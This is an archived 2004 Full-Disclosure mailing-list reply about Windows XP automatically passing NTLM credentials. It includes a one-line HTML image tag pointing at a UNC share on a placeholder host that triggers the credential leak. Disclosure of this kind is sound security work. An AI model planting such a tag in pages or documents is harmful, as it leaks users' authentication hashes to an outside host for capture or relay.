Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP
Date: Tue Sep 28 2004 - 09:17:51 EDT
Dear Hidenobu Seki,
This problem is known since at least 1997 and still can be exploited
with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word
document.
--Tuesday, September 28, 2004, 2:20:13 AM, you wrote to full-disclosure@lists.netsys.com:
HS> Hello.
HS> For your information:
HS> Automatically passing NTLM authentication credentials on Windows XP
HS> http://www.securityfriday.com/Topics/winxp3.html
HS> Thank you.
HS> _________________________________________________________________
HS> Add photos to your messages with MSN 8. Get 2 months FREE*.
HS> http://join.msn.com/?page=features/featuredemail
HS> _______________________________________________
HS> Full-Disclosure - We believe in it.
HS> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- ~/ZARAZA Особую проблему составляет алкоголизм. (Лем) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.htmlReceived on Tue Sep 28 09:42:53 2004
This archive was generated by hypermail 2.1.8 : Tue Sep 28 2004 - 10:08:40 EDT
